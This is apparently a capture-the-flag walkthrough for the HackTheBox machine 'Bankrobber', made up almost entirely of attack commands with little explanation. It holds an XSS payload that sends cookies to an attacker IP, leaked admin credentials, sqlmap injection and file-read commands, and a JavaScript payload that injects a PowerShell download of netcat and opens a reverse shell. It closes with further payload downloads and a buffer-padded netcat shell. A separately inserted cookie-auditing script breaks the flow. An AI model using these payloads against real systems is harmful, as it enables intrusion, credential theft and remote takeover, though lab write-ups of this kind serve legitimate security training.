HackTheBox – Bankrobber

Register an account here:

Email : test@gmail.com

Password: test@123

root@kali:~/Downloads# gobuster dir -u http://10.10.10.154 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

<script>new Image().src="http://10.10.15.194:90/test?output="+document.cookie;</script>

username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D

Now try to log in with the admin credentials:

Username : admin

Password: Hopelessromantic
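
The captured cookie above carries the admin credentials as URL-encoded Base64, which is why they can be read straight off it. The following is an added example, not part of the original writeup, that decodes such a cookie string and flags credential-bearing cookies; the names auditCookie, decodeIfBase64 and SENSITIVE are assumptions made for illustration.

```javascript
// Added example: audit a Cookie string for credentials stored as reversible Base64.
// auditCookie, decodeIfBase64 and SENSITIVE are hypothetical names, not from the writeup.

// Cookie string exactly as shown in the writeup above.
const captured = "username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";

// Cookie names that should never hold a recoverable secret.
const SENSITIVE = /^(user(name)?|pass(word)?|pwd|login)$/i;

// Return the decoded text if s is canonical Base64 of printable ASCII, else null.
function decodeIfBase64(s) {
  if (s.length % 4 !== 0 || !/^[A-Za-z0-9+/]+={0,2}$/.test(s)) return null;
  const buf = Buffer.from(s, "base64");
  if (buf.toString("base64") !== s) return null; // reject non-canonical input
  const text = buf.toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Split the cookie string, URL-decode each pair, and report sensitive
// names whose values decode cleanly from Base64.
function auditCookie(header) {
  const findings = [];
  for (const raw of header.split(";")) {
    const part = decodeURIComponent(raw).trim();
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    const name = part.slice(0, eq);
    const decoded = decodeIfBase64(part.slice(eq + 1));
    if (SENSITIVE.test(name) && decoded !== null) {
      findings.push({ name, decoded, issue: "credential stored as reversible Base64" });
    }
  }
  return findings;
}

console.log(auditCookie(captured));
```

A session cookie that holds only an opaque random identifier and is set with the HttpOnly attribute would neither expose credentials nor be readable through document.cookie.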

root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php --data "term=1*" --cookie="id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==" --dbms=MySQL -D bankrobber --dump

root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php --data "term=1*" --cookie="id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==" --dbms=MySQL --file-read=c:\\xampp\\htdocs\\admin\\backdoorchecker.php

root@kali:~/Downloads# cat shell.js

var request = new XMLHttpRequest();

var params = 'cmd=dir|powershell -c "iwr -uri 10.10.15.230/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.15.230 4445';

request.open('POST', 'http://localhost/admin/backdoorchecker.php', true);

request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

request.send(params);

We can see bankv2

PS C:\Windows\Temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.15.230/mp.exe", "C:\Windows\Temp\mp.exe")

[$] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\Windows\Temp\nc.exe -e cmd.exe 10.10.15.230 9000

@SAKSHAM DIXIT